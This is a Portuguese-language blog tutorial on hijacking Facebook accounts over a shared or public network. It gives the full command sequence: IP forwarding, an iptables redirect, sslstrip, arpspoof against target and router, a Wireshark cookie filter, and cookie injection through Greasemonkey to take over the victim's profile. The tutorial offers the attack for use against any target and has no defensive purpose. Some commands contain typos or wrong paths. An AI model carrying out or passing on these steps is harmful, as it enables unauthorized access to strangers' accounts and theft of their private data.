Últimos Conteúdos

Hackeando Facebook com Wireshark e Cookie Injector

Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve.

Vamos precisar de:

Uma distro Linux para facilitar
Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac)
SSLStrip
Wireshark
Arpspoof
Greasemonkey
Cookie injector para Greasemonkey
Firefox ou Iceweasel

Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil.

Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra...

Vamos ao tuto então!

Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:
 echo 1 > /proc/sys/net/ipv4/ip_forwarding


O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego:

 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego:
 sslstrp -a -l 8080


Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego:

 arpspoof -i eth0 -t ip_do_alvo ip_do_roteador
arpspoof -i eth0 -t ip_do_roteador ip_do_alvo



E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro:

 http.cookie contains datr


Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece:

Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only:


Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes:


Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou:


E ai está! Estamos no perfil da vítima!


Algumas considerações finais:
Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque.
Se a pessoa estiver logando automaticamente porque ela marcou a caixa "Mantenha-me conectado" anteriormente pode ser que isso não funcione.

Nenhum comentário